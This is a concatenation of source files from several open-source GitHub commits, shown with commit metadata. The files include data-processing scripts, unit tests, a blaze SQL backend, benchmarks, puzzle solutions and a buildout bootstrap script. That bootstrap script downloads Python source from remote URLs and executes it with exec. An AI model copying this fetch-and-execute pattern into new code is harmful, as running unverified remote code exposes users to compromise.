        (dirname, filename) = os.path.split(name)
        dirnamepath = os.path.join(tmpfolderpath, dirname)
        if not os.path.exists(dirnamepath):
            os.makedirs(dirnamepath)
        zfile.extract(name, dirnamepath)
    return tmpfolderpath
# xml parser and writer csv
def parse_xml(xmlfile, lock):
    """Extract id/level and object names from one XML file into the CSVs.

    Expects the root to contain <var name="id"/> and <var name="level"/>
    (IndexError if missing) plus an <objects><object .../> list; every
    object attribute value becomes one row in CSV_ID_OBJECT.
    """
    tree = ET.parse(xmlfile)
    root = tree.getroot()
    id = root.findall("./var[@name='id']")[0].get('value')
    level = root.findall("./var[@name='level']")[0].get('value')
    write_csv(CSV_ID_LEVEL, ['id', 'level'], {'id': id, 'level': level}, lock)
    for obj in root.findall('./objects/object'):
        for key, value in obj.items():
            write_csv(CSV_ID_OBJECT, ['id', 'object_name'], {'id': id, 'object_name': value}, lock)
def remove_unzip_folder():
    """Delete the ./unzip working directory (only when DELETEXML is set
    and the folder exists)."""
    if DELETEXML and os.path.exists(UNZIPFOLDER):
        shutil.rmtree(UNZIPFOLDER)
# process worker
def worker(quezip, lock):
    """Consume zip paths from `quezip` until a 'STOP' sentinel arrives.

    For each archive: log it, unpack it under ./unzip, and feed every
    .xml file found in the unpacked tree to parse_xml.
    """
    while True:
        item = quezip.get()
        if (item == 'STOP'):
            break
        print_lock(item,lock)
        tmpfolderpath = unzip_archive(item)
        # find all xml
        for root, dirs, files in os.walk(tmpfolderpath):
            for file in files:
                if file.endswith(".xml"):
                    f = os.path.join(root, file)
                    parse_xml(f, lock)
def main():
    """Queue every file under ./zip for worker processes, then shut down.

    Spawns -p worker processes (default 2) that unzip each archive and
    extract its XML data into the two CSV files; workers are stopped by
    one 'STOP' sentinel per process.
    """
    parser = argparse.ArgumentParser(description='Do *.csv files.')
    parser.add_argument('-p', type=int, help='count processes', default=2)
    args = parser.parse_args()
    countprocesses = args.p
    start = time.perf_counter()
    print(os.getcwd())
    create_new_file(CSV_ID_LEVEL, ['id', 'level'])
    # Header now matches the 'object_name' field parse_xml() writes (the
    # file previously got an 'id,object' header over id/object_name rows).
    create_new_file(CSV_ID_OBJECT, ['id', 'object_name'])
    remove_unzip_folder()
    lock = Lock()
    quezip = Queue()
    # Submit tasks
    for root, dirs, files in os.walk("zip"):
        for file in files:
            zf = os.path.normpath(os.path.join(root, file))
            quezip.put(zf)
    processes = []
    for i in range(countprocesses):
        p = Process(target=worker, args=(quezip, lock))
        p.start()
        processes.append(p)
    # Tell child processes to stop
    for i in range(countprocesses):
        quezip.put('STOP')
    for p in processes:
        p.join()
    remove_unzip_folder()
    print('time:', time.perf_counter() - start)
if __name__ == '__main__':
main()
| mit | Python | |
68babe2de9a8204c46ad23e1c82dd0ff8fe44c94 | Add a unittest on plot_figs module. | jeremiedecock/pyarm,jeremiedecock/pyarm | pyarm/tests/test_plot_figs.py | pyarm/tests/test_plot_figs.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2010 Jérémie DECOCK (http://www.jdhp.org)
import unittest
import os
import sys
dirname = os.path.dirname(__file__)
if dirname == '':
dirname = '.'
dirname = os.path.realpath(dirname)
updir = os.path.split(dirname)[0]
if updir not in sys.path:
sys.path.append(updir)
###
import plot_figs
class PlotFigsTest(unittest.TestCase):
def setUp(self):
pass
def test_main(self):
try:
plot_figs.main()
except:
self.fail()
def tearDown(self):
# Remove files
files = ("arm_Kambara_c_forearm.png", "muscle_Kambara_k.png",
"muscle_Kambara_lr.png", "muscle_Li_fa.png",
"muscle_Li_fl.png", "muscle_Li_nf.png",
"muscle_Mitrovic_lm.png", "muscle_Mitrovic_v.png",
"arm_Mitrovic_c_forearm.png", "muscle_Kambara_lm.png",
"muscle_Kambara_v.png", "muscle_Li_fe.png",
"muscle_Li_fv.png", "muscle_Mitrovic_k.png",
"muscle_Mitrovic_lr.png")
try:
map(os.remove, files)
except:
pass
###
def test_suite():
    """Return a TestSuite with all PlotFigsTest cases (used by unittest.main)."""
    tests = [unittest.makeSuite(PlotFigsTest)]
    return unittest.TestSuite(tests)
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
| mit | Python | |
f34fb2b060c7fd977ca50753c8c1c9d5beaf0516 | return index at which acf drops below thresh | isomerase/RoboSkeeter,isomerase/mozziesniff | agent_model/acfanalyze.py | agent_model/acfanalyze.py | __author__ = 'richard'
import os
import numpy as np
import pandas as pd
from glob import glob
import statsmodels.tsa
import statsmodels.graphics.tsaplots
import matplotlib.pyplot as plt
plt.style.use('ggplot')
TRAJECTORY_DATA_DIR = "experimental_data/control_trajectories/"
def make_csv_name_list():
# TODO export this to io
print "Loading + filtering CSV files from ", TRAJECTORY_DATA_DIR
os.chdir(TRAJECTORY_DATA_DIR)
csv_list = sorted([os.path.splitext(file)[0] for file in glob("*.csv")])
os.chdir(os.path.dirname(__file__)) # go back to old dir
return csv_list
def load_trajectory_dynamics_csv(data_fname):
file_path = os.path.join(os.getcwd(), TRAJECTORY_DATA_DIR, data_fname + ".csv")
col_labels = [
'pos_x',
'pos_y',
'pos_z',
'velo_x',
'velo_y',
'velo_z',
'accel_x',
'accel_y',
'accel_z',
'heading_angle',
'angular_velo_xy',
'angular_velo_yz',
'curvature'
]
dyn_trajectory_DF = pd.read_csv(file_path, na_values="NaN", names=col_labels) # recognize string as NaN
dyn_trajectory_DF.fillna(value=0, inplace=True)
return dyn_trajectory_DF
def arg_less(inarray, threshold):
    """Return the index of the first element of `inarray` below `threshold`.

    Raises IndexError if no element is below the threshold.
    """
    # np.nonzero was previously computed twice (once into an unused local);
    # a single call is sufficient.
    return np.nonzero(inarray < threshold)[0][0]
csv_list = make_csv_name_list()
for csv_name in csv_list:
df = load_trajectory_dynamics_csv(csv_name)
print csv_name, 'size/timesteps = ', df.size
if not os.path.exists('./correlation_figs/{data_name}'.format(data_name = csv_name)):
os.makedirs('./correlation_figs/{data_name}'.format(data_name = csv_name))
for label, col in df.iteritems():
if label in ['velo_x', 'velo_y', 'velo_z']:
acf = statsmodels.tsa.stattools.acf(col, nlags = 70)
print label, arg_less(acf, .5) | mit | Python | |
96ca06b93aa33fbe779a6e7c6c85439e5b62b1a8 | Add `pysymoro/screw6.py` | galou/symoro,ELZo3/symoro,symoro/symoro,galou/symoro,symoro/symoro,ELZo3/symoro | pysymoro/screw6.py | pysymoro/screw6.py | # -*- coding: utf-8 -*-
"""
This module contains the Screw6 data structure.
"""
from sympy import zeros
from sympy import ShapeError
class Screw6(object):
"""
Data structure:
Represent the data structure (base class) to hold a 6x6 matrix
which in turn contains four 3x3 matrices.
"""
def __init__(self, *args, **kwargs):
"""Constructor period."""
self._val = zeros(6, 6)
@property
def val(self):
"""
Get current value.
Returns:
A 6x6 Matrix with the current value
"""
return self._val
@val.setter
def val(self, value):
"""
Set the current value.
Args:
value: A 6x6 Matrix
"""
if value.rows != 6 or value.cols != 6:
raise ShapeError("Matrix size has to be 6x6.")
self._val = value
@property
def topleft(self):
"""
Get the top-left part of the 6x6 matrix.
Returns:
A 3x3 Matrix.
"""
return self._val[0:3, 0:3]
@property
def topright(self):
"""
Get the top-right part of the 6x6 matrix.
Returns:
A 3x3 Matrix.
"""
return self._val[0:3, 3:6]
@property
def botleft(self):
"""
Get the bottom-left part of the 6x6 matrix.
Returns:
A 3x3 Matrix.
"""
return self._val[3:6, 0:3]
@property
def botright(self):
"""
Get the bottom-right part of the 6x6 matrix.
Returns:
A 3x3 Matrix.
"""
return self._val[3:6, 3:6]
@topleft.setter
def topleft(self, value):
"""
Set the top-left part of the 6x6 matrix.
Args:
value: A 3x3 Matrix - top-left value.
"""
if value.rows != 3 or value.cols != 3:
raise ShapeError("Top-left value size has to be 3x3.")
self._val[0:3, 0:3] = value
@topright.setter
def topright(self, value):
"""
Set the top-right part of the 6x6 matrix.
Args:
value: A 3x3 Matrix - top-right value.
"""
if value.rows != 3 or value.cols != 3:
raise ShapeError("Top-right value size has to be 3x3.")
self._val[0:3, 3:6] = value
@botleft.setter
def botleft(self, value):
"""
Set the bottom-left part of the 6x6 matrix.
Args:
value: A 3x3 Matrix - bottom-left value.
"""
if value.rows != 3 or value.cols != 3:
raise ShapeError("Bottom-left value size has to be 3x3.")
self._val[3:6, 0:3] = value
@botright.setter
def botright(self, value):
"""
Set the bottom-right part of the 6x6 matrix.
Args:
value: A 3x3 Matrix - bottom-right value.
"""
if value.rows != 3 or value.cols != 3:
raise ShapeError("Bottom-right value size has to be 3x3.")
self._val[3:6, 3:6] = value
| mit | Python | |
e3b5f7b0f47b1e7ad4ab024c76a270ba9e88aa02 | add impala sqlalchemy resource function | alexmojaki/blaze,jcrist/blaze,ContinuumIO/blaze,LiaoPan/blaze,cpcloud/blaze,maxalbert/blaze,cowlicks/blaze,caseyclements/blaze,ChinaQuants/blaze,ChinaQuants/blaze,dwillmer/blaze,xlhtc007/blaze,scls19fr/blaze,cpcloud/blaze,ContinuumIO/blaze,nkhuyu/blaze,caseyclements/blaze,mrocklin/blaze,scls19fr/blaze,nkhuyu/blaze,cowlicks/blaze,jcrist/blaze,mrocklin/blaze,jdmcbr/blaze,LiaoPan/blaze,xlhtc007/blaze,dwillmer/blaze,alexmojaki/blaze,maxalbert/blaze,jdmcbr/blaze | blaze/sql.py | blaze/sql.py | from __future__ import absolute_import, division, print_function
from .compute.sql import select
from .data.sql import SQL, dispatch, first
from .expr import Expr, TableExpr, Projection, Column, UnaryOp
from .expr.scalar.core import Scalar
from .compatibility import basestring
from .api.resource import resource

import sqlalchemy as sa

__all__ = ['compute_up', 'SQL']


@dispatch((Column, Projection, Expr, UnaryOp), SQL)
def compute_up(t, ddesc, **kwargs):
    # Unwrap the SQL data descriptor and dispatch on the underlying table.
    return compute_up(t, ddesc.table, **kwargs)


@dispatch(Expr, sa.sql.ClauseElement, dict)
def post_compute(expr, query, d):
    """ Execute SQLAlchemy query against SQLAlchemy engines

    If the result of compute is a SQLAlchemy query then it is likely that the
    data elements are themselves SQL objects which contain SQLAlchemy engines.
    We find these engines and, if they are all the same, run the query against
    these engines and return the result.
    """
    if not all(isinstance(val, SQL) for val in d.values()):
        return query

    engines = set(dd.engine for dd in d.values())

    # Engines compare by identity; compare their URL strings so that two
    # handles onto the same database count as a single engine.
    if len(set(map(str, engines))) != 1:
        raise NotImplementedError("Expected single SQLAlchemy engine")

    engine = first(engines)

    with engine.connect() as conn:  # Perform query
        result = conn.execute(select(query)).fetchall()

    if isinstance(expr, Scalar):
        return result[0][0]
    if isinstance(expr, TableExpr) and expr.iscolumn:
        return [x[0] for x in result]
    return result


@dispatch(SQL)
def drop(s):
    """Drop the table backing this SQL data descriptor."""
    s.table.drop(s.engine)


@dispatch(SQL, basestring)
def create_index(s, column, name=None, unique=False):
    """Create a named index over a single column."""
    if name is None:
        raise ValueError('SQL indexes must have a name')
    sa.Index(name, getattr(s.table.c, column), unique=unique).create(s.engine)


@dispatch(SQL, list)
def create_index(s, columns, name=None, unique=False):
    """Create a named composite index over several columns."""
    if name is None:
        raise ValueError('SQL indexes must have a name')
    args = (name,)
    args += tuple(getattr(s.table.c, column) for column in columns)
    sa.Index(*args, unique=unique).create(s.engine)


@resource.register('(sqlite|postgresql|mysql)://.*')
def resource_sql(uri, table_name, *args, **kwargs):
    return SQL(uri, table_name, *args, **kwargs)


# Bug fix: this function was also named ``resource_sql``, silently shadowing
# the one above at module level.  The decorator registration is what matters,
# so only the binding name changes.
@resource.register('impala://.*')
def resource_sql_impala(uri, table_name, *args, **kwargs):
    import impala.sqlalchemy  # registers the Impala SQLAlchemy dialect
    return SQL(uri, table_name, *args, **kwargs)
| from __future__ import absolute_import, division, print_function
from .compute.sql import select
from .data.sql import SQL, dispatch, first
from .expr import Expr, TableExpr, Projection, Column, UnaryOp
from .expr.scalar.core import Scalar
from .compatibility import basestring
from .api.resource import resource
import sqlalchemy as sa
__all__ = ['compute_up', 'SQL']
@dispatch((Column, Projection, Expr, UnaryOp), SQL)
def compute_up(t, ddesc, **kwargs):
return compute_up(t, ddesc.table, **kwargs)
@dispatch(Expr, sa.sql.ClauseElement, dict)
def post_compute(expr, query, d):
""" Execute SQLAlchemy query against SQLAlchemy engines
If the result of compute is a SQLAlchemy query then it is likely that the
data elements are themselves SQL objects which contain SQLAlchemy engines.
We find these engines and, if they are all the same, run the query against
these engines and return the result.
"""
if not all(isinstance(val, SQL) for val in d.values()):
return query
engines = set([dd.engine for dd in d.values()])
if len(set(map(str, engines))) != 1:
raise NotImplementedError("Expected single SQLAlchemy engine")
engine = first(engines)
with engine.connect() as conn: # Perform query
result = conn.execute(select(query)).fetchall()
if isinstance(expr, Scalar):
return result[0][0]
if isinstance(expr, TableExpr) and expr.iscolumn:
return [x[0] for x in result]
return result
@dispatch(SQL)
def drop(s):
s.table.drop(s.engine)
@dispatch(SQL, basestring)
def create_index(s, column, name=None, unique=False):
if name is None:
raise ValueError('SQL indexes must have a name')
sa.Index(name, getattr(s.table.c, column), unique=unique).create(s.engine)
@dispatch(SQL, list)
def create_index(s, columns, name=None, unique=False):
if name is None:
raise ValueError('SQL indexes must have a name')
args = name,
args += tuple(getattr(s.table.c, column) for column in columns)
sa.Index(*args, unique=unique).create(s.engine)
@resource.register('(sqlite|postgresql|mysql)://.*')
def resource_sql(uri, table_name, *args, **kwargs):
return SQL(uri, table_name, *args, **kwargs)
| bsd-3-clause | Python |
d952776a78901ecd20cb8e79cd00f5498e4b04be | Add generate anagrams | gsathya/dsalgo,gsathya/dsalgo | algo/generate_anagrams.py | algo/generate_anagrams.py | import sys
from random import shuffle  # fix: "import shuffle from random" was a SyntaxError


def generate_anagrams(word, count=10):
    """Return `count` random rearrangements of `word`.

    Shuffles are random, so repeats are possible for short words.
    """
    letters = list(word)
    anagrams = []
    for _ in range(count):
        # random.shuffle works in place and returns None, so shuffle first
        # and join afterwards (the original joined the None return value).
        shuffle(letters)
        anagrams.append(''.join(letters))
    return anagrams


if __name__ == '__main__':
    # Guarded so importing this module has no side effects.
    print(generate_anagrams(sys.argv[1]))
| mit | Python | |
2cfd4864df3536f7d8523a0f5f5ef98a5c6113af | add bootstrap.py | nylas/icalendar,untitaker/icalendar,geier/icalendar | bootstrap.py | bootstrap.py | ##############################################################################
#
# Copyright (c) 2006 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Bootstrap a buildout-based project
Simply run this script in a directory containing a buildout.cfg.
The script accepts buildout command-line options, so you can
use the -c option to specify an alternate configuration file.
"""
import os, shutil, sys, tempfile, urllib2
from optparse import OptionParser
tmpeggs = tempfile.mkdtemp()
is_jython = sys.platform.startswith('java')
# parsing arguments
parser = OptionParser()
parser.add_option("-v", "--version", dest="version",
help="use a specific zc.buildout version")
parser.add_option("-d", "--distribute",
action="store_true", dest="distribute", default=False,
help="Use Disribute rather than Setuptools.")
parser.add_option("-c", None, action="store", dest="config_file",
help=("Specify the path to the buildout configuration "
"file to be used."))
options, args = parser.parse_args()
# if -c was provided, we push it back into args for buildout' main function
if options.config_file is not None:
args += ['-c', options.config_file]
if options.version is not None:
VERSION = '==%s' % options.version
else:
VERSION = ''
# We decided to always use distribute, make sure this is the default for us
# USE_DISTRIBUTE = options.distribute
USE_DISTRIBUTE = True
args = args + ['bootstrap']
to_reload = False
try:
import pkg_resources
if not hasattr(pkg_resources, '_distribute'):
to_reload = True
raise ImportError
except ImportError:
ez = {}
if USE_DISTRIBUTE:
exec urllib2.urlopen('http://python-distribute.org/distribute_setup.py'
).read() in ez
ez['use_setuptools'](to_dir=tmpeggs, download_delay=0, no_fake=True)
else:
exec urllib2.urlopen('http://peak.telecommunity.com/dist/ez_setup.py'
).read() in ez
ez['use_setuptools'](to_dir=tmpeggs, download_delay=0)
if to_reload:
reload(pkg_resources)
else:
import pkg_resources
if sys.platform == 'win32':
def quote(c):
if ' ' in c:
return '"%s"' % c # work around spawn lamosity on windows
else:
return c
else:
def quote (c):
return c
cmd = 'from setuptools.command.easy_install import main; main()'
ws = pkg_resources.working_set
if USE_DISTRIBUTE:
requirement = 'distribute'
else:
requirement = 'setuptools'
if is_jython:
import subprocess
assert subprocess.Popen([sys.executable] + ['-c', quote(cmd), '-mqNxd',
quote(tmpeggs), 'zc.buildout' + VERSION],
env=dict(os.environ,
PYTHONPATH=
ws.find(pkg_resources.Requirement.parse(requirement)).location
),
).wait() == 0
else:
assert os.spawnle(
os.P_WAIT, sys.executable, quote (sys.executable),
'-c', quote (cmd), '-mqNxd', quote (tmpeggs), 'zc.buildout' + VERSION,
dict(os.environ,
PYTHONPATH=
ws.find(pkg_resources.Requirement.parse(requirement)).location
),
) == 0
ws.add_entry(tmpeggs)
ws.require('zc.buildout' + VERSION)
import zc.buildout.buildout
zc.buildout.buildout.main(args)
shutil.rmtree(tmpeggs)
| bsd-2-clause | Python | |
4d021acd89abc127d50e6bf82064bd7aac2bca1a | Solve compree the string with groupby | rootulp/hackerrank,rootulp/hackerrank,rootulp/hackerrank,rootulp/hackerrank,rootulp/hackerrank,rootulp/hackerrank | python/compress-the-string.py | python/compress-the-string.py | from itertools import groupby
# Collapse consecutive runs: for each run emit "(count, char)".
line = input()
pairs = ("({}, {})".format(sum(1 for _ in run), ch) for ch, run in groupby(line))
print(" ".join(pairs))
| mit | Python | |
cf3a1c26ab650ad2a87d4b4dcc6754c70abde802 | Create compat.py | Programmeerclub-WLG/Agenda-App | backend/compat.py | backend/compat.py | apache-2.0 | Python | ||
f11ce837f0200d501c34c8fa7b2f5cfd149c18b6 | Add db migrations | wk-tech/crm-smsfly,wk-tech/crm-smsfly,wk-tech/crm-smsfly | SMSFlyCRM/SMSApp/migrations/0002_auto_20160602_2034.py | SMSFlyCRM/SMSApp/migrations/0002_auto_20160602_2034.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-06-02 20:34
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('SMSApp', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='task',
name='start_date',
),
migrations.AddField(
model_name='task',
name='start_datetime',
field=models.DateTimeField(default=datetime.datetime.now),
),
migrations.AlterField(
model_name='alphaname',
name='status',
field=models.IntegerField(choices=[(0, 'ACTIVE'), (1, 'BLOCKED'), (2, 'MODERATE'), (3, 'LIMITED')], null=True),
),
migrations.AlterField(
model_name='task',
name='end_date',
field=models.DateField(null=True),
),
]
| mit | Python | |
86657d78f220345391dc764db22cd9f02903f3a9 | Add tests | onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle | bluebottle/initiatives/tests/test_admin.py | bluebottle/initiatives/tests/test_admin.py | # -*- coding: utf-8 -*-
from django.contrib.admin.sites import AdminSite
from django.urls.base import reverse
from bluebottle.initiatives.admin import InitiativeAdmin
from bluebottle.initiatives.models import Initiative
from bluebottle.initiatives.tests.factories import InitiativeFactory
from bluebottle.test.utils import BluebottleAdminTestCase
class TestInitiativeAdmin(BluebottleAdminTestCase):
def setUp(self):
super(TestInitiativeAdmin, self).setUp()
self.site = AdminSite()
self.initiative_admin = InitiativeAdmin(Initiative, self.site)
self.initiative = InitiativeFactory.create()
self.initiative.submit()
self.initiative.save()
def test_review_initiative(self):
self.client.force_login(self.superuser)
review_url = reverse('admin:initiatives_initiative_transition',
args=(self.initiative.id, 'accept'))
response = self.client.get(review_url)
# Should show confirmation page
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'Are you sure you want to change')
# Confirm should change status
response = self.client.post(review_url, {'confirm': True})
self.assertEqual(response.status_code, 302, 'Should redirect back to initiative change')
self.initiative = Initiative.objects.get(pk=self.initiative.id)
self.assertEqual(self.initiative.review_status, 'accepted')
def test_review_initiative_unauthorized(self):
review_url = reverse('admin:initiatives_initiative_transition',
args=(self.initiative.id, 'accept'))
response = self.client.post(review_url, {'confirm': False})
# Should be denied
self.assertEqual(response.status_code, 403)
self.initiative = Initiative.objects.get(pk=self.initiative.id)
self.assertEqual(self.initiative.review_status, 'submitted')
| bsd-3-clause | Python | |
a383d1220c31f153a5519e4aab4703db2b71ef53 | Add initial version of season goal leader retrieval | leaffan/pynhldb | analysis/_goal_leaders.py | analysis/_goal_leaders.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
from lxml import html
SEASON_URL_TEMPLATE = "http://www.hockey-reference.com/leagues/NHL_%d.html"
CAREER_GOAL_LEADERS_URL = "http://www.hockey-reference.com/leaders/goals_career.html"
season_goal_leaders = set()
for year in range(1918, 2017)[:0]:
# skipping season completely lost to a lockout
if year == 2005:
continue
season = "%d-%s" % (year - 1, str(year)[-2:])
# retrieving raw html data and parsing it
url = SEASON_URL_TEMPLATE % year
r = requests.get(url)
doc = html.fromstring(r.text)
# the stuff we're interested in is hidden in comments
comments = doc.xpath("//comment()")
for comment in comments:
# removing comment markup
sub = html.fromstring(str(comment)[3:-3])
if not sub.xpath("//table/caption/text()"):
continue
if sub.xpath("//table/caption/text()")[0] == "Goals":
leaders = sub
break
# retrieving five best goalscorers in current season as list
five_goal_leaders = leaders.xpath(
"//div[@id='leaders_goals']/table/tr/td[@class='who']/a")
# adding name and link to player page to goalscorer dictionary
for leader in five_goal_leaders:
season_goal_leaders.add(
(leader.xpath("@href")[0], leader.xpath("text()")[0]))
r = requests.get(CAREER_GOAL_LEADERS_URL)
doc = html.fromstring(r.text)
print(sorted(season_goal_leaders))
| mit | Python | |
10ce581d1ecbba29913982a56f32c3d93a1b54fe | Add Python benchmark | stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib | lib/node_modules/@stdlib/math/base/special/gamma/benchmark/python/benchmark.py | lib/node_modules/@stdlib/math/base/special/gamma/benchmark/python/benchmark.py | #!/usr/bin/env python
"""Benchmark gamma."""
from __future__ import print_function
import timeit
NAME = "gamma"
REPEATS = 3
ITERATIONS = 1000000
def print_version():
"""Print the TAP version."""
print("TAP version 13")
def print_summary(total, passing):
"""Print the benchmark summary.
# Arguments
* `total`: total number of tests
* `passing`: number of passing tests
"""
print("#")
print("1.." + str(total)) # TAP plan
print("# total " + str(total))
print("# pass " + str(passing))
print("#")
print("# ok")
def print_results(elapsed):
"""Print benchmark results.
# Arguments
* `elapsed`: elapsed time (in seconds)
# Examples
``` python
python> print_results(0.131009101868)
```
"""
rate = ITERATIONS / elapsed
print(" ---")
print(" iterations: " + str(ITERATIONS))
print(" elapsed: " + str(elapsed))
print(" rate: " + str(rate))
print(" ...")
def benchmark():
"""Run the benchmark and print benchmark results."""
setup = "from math import gamma; from random import random;"
stmt = "y = gamma(171.0*random() - 0.0)"
t = timeit.Timer(stmt, setup=setup)
print_version()
for i in xrange(REPEATS):
print("# python::" + NAME)
elapsed = t.timeit(number=ITERATIONS)
print_results(elapsed)
print("ok " + str(i+1) + " benchmark finished")
print_summary(REPEATS, REPEATS)
def main():
"""Run the benchmark."""
benchmark()
if __name__ == "__main__":
main()
| apache-2.0 | Python | |
66328709459b2217b3c964848a363c4f3b1cdf5e | Add Python benchmark | stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib,stdlib-js/stdlib | lib/node_modules/@stdlib/math/base/special/trunc/benchmark/python/benchmark.py | lib/node_modules/@stdlib/math/base/special/trunc/benchmark/python/benchmark.py | #!/usr/bin/env python
"""Benchmark trunc."""
from __future__ import print_function
import timeit
NAME = "trunc"
REPEATS = 3
ITERATIONS = 1000000
def print_version():
"""Print the TAP version."""
print("TAP version 13")
def print_summary(total, passing):
"""Print the benchmark summary.
# Arguments
* `total`: total number of tests
* `passing`: number of passing tests
"""
print("#")
print("1.." + str(total)) # TAP plan
print("# total " + str(total))
print("# pass " + str(passing))
print("#")
print("# ok")
def print_results(elapsed):
"""Print benchmark results.
# Arguments
* `elapsed`: elapsed time (in seconds)
# Examples
``` python
python> print_results(0.131009101868)
```
"""
rate = ITERATIONS / elapsed
print(" ---")
print(" iterations: " + str(ITERATIONS))
print(" elapsed: " + str(elapsed))
print(" rate: " + str(rate))
print(" ...")
def benchmark():
"""Run the benchmark and print benchmark results."""
setup = "from math import trunc; from random import random;"
stmt = "y = trunc(1000.0*random() - 500.0)"
t = timeit.Timer(stmt, setup=setup)
print_version()
for i in xrange(REPEATS):
print("# python::" + NAME)
elapsed = t.timeit(number=ITERATIONS)
print_results(elapsed)
print("ok " + str(i+1) + " benchmark finished")
print_summary(REPEATS, REPEATS)
def main():
"""Run the benchmark."""
benchmark()
if __name__ == "__main__":
main()
| apache-2.0 | Python | |
37b175b6a6ac3f0fd7fdaa5c2ed6435c159a29c2 | Add py solution for 553. Optimal Division | ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode | py/optimal-division.py | py/optimal-division.py | from fractions import Fraction
class Solution(object):
    def optimalDivision(self, nums):
        """
        :type nums: List[int]
        :rtype: str

        Interval DP over exact Fractions: for every span record the extreme
        (min/max) value reachable and the split that achieves it, then
        rebuild the parenthesized expression along the recorded cuts.
        """
        n = len(nums)
        lo_val, hi_val = {}, {}
        lo_cut, hi_cut = {}, {}

        for i, num in enumerate(nums):
            lo_val[i, i + 1] = hi_val[i, i + 1] = Fraction(num)

        for length in range(2, n + 1):
            for i in range(n - length + 1):
                end = i + length
                best_lo = best_hi = None
                cut_lo = cut_hi = None
                for cut in range(i + 1, end):
                    # Minimizing the whole span means minimizing the
                    # numerator and maximizing the denominator (and the
                    # symmetric choice for maximizing).
                    cand_lo = lo_val[i, cut] / hi_val[cut, end]
                    cand_hi = hi_val[i, cut] / lo_val[cut, end]
                    if best_lo is None or cand_lo < best_lo:
                        best_lo, cut_lo = cand_lo, cut
                    if best_hi is None or cand_hi > best_hi:
                        best_hi, cut_hi = cand_hi, cut
                lo_val[i, end] = best_lo
                hi_val[i, end] = best_hi
                lo_cut[i, end] = cut_lo
                hi_cut[i, end] = cut_hi

        def render(start, end, need_max=True):
            # Rebuild the expression along the recorded optimal cuts; the
            # denominator flips the optimization goal and is parenthesized
            # whenever it spans more than one operand.
            if start + 1 == end:
                return str(nums[start])
            cut = hi_cut[start, end] if need_max else lo_cut[start, end]
            out = render(start, cut, need_max) + "/"
            denom = render(cut, end, not need_max)
            if end - cut > 1:
                out += "(" + denom + ")"
            else:
                out += denom
            return out

        return render(0, n)
| apache-2.0 | Python | |
e14c4f1aeb15491ecbf2981527e2409ab3e82653 | Test for BuildQuerySet.concurrent logic | rtfd/readthedocs.org,rtfd/readthedocs.org,rtfd/readthedocs.org,rtfd/readthedocs.org | readthedocs/builds/tests/test_build_queryset.py | readthedocs/builds/tests/test_build_queryset.py | import pytest
import django_dynamic_fixture as fixture
from django.conf import settings
from readthedocs.builds.querysets import BuildQuerySet
from readthedocs.builds.models import Build, Version
from readthedocs.projects.models import Project, Feature
@pytest.mark.django_db
class TestBuildQuerySet:
def test_concurrent_builds(self):
project = fixture.get(
Project,
max_concurrent_builds=None,
main_language_project=None,
)
for state in ('triggered', 'building', 'cloning', 'finished'):
fixture.get(
Build,
project=project,
state=state,
)
assert (False, 2, 4) == Build.objects.concurrent(project)
for state in ('building', 'cloning'):
fixture.get(
Build,
project=project,
state=state,
)
assert (True, 4, 4) == Build.objects.concurrent(project)
def test_concurrent_builds_project_limited(self):
project = fixture.get(
Project,
max_concurrent_builds=2,
main_language_project=None,
)
for state in ('triggered', 'building', 'cloning', 'finished'):
fixture.get(
Build,
project=project,
state=state,
)
assert (True, 2, 2) == Build.objects.concurrent(project)
def test_concurrent_builds_translations(self):
project = fixture.get(
Project,
max_concurrent_builds=None,
main_language_project=None,
)
translation = fixture.get(
Project,
max_concurrent_builds=None,
main_language_project=project,
)
for state in ('triggered', 'building', 'cloning', 'finished'):
fixture.get(
Build,
project=project,
state=state,
)
assert (False, 2, 4) == Build.objects.concurrent(translation)
for state in ('building', 'cloning'):
fixture.get(
Build,
project=translation,
state=state,
)
assert (True, 4, 4) == Build.objects.concurrent(translation)
assert (True, 4, 4) == Build.objects.concurrent(project)
| mit | Python | |
4c428b78f9bf4d5f044a23921a6f29df34c93753 | add python process pool example | yuncliu/Learn,yuncliu/Learn,yuncliu/Learn,yuncliu/Learn,yuncliu/Learn,yuncliu/Learn,yuncliu/Learn | python/process_pool.py | python/process_pool.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Fan the integers 0..999 out to a pool of ten worker processes."""
from multiprocessing import Pool


def worker(a):
    # Each task simply echoes its argument to stdout.
    print(a)


if __name__ == "__main__":
    pool = Pool(10)
    pool.map(worker, range(1000))
| bsd-3-clause | Python | |
565dab9ae60d6c7fa92d3385ef4515933850d4a0 | Create __init__.py | gwsilva/rdc-16 | rdc_16/__init__.py | rdc_16/__init__.py |
# -*- coding: utf-8 -*-
##############################################################################
#
# Author: Gideoni Silva (Omnes)
# Copyright 2013-2014 Omnes Tecnologia
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
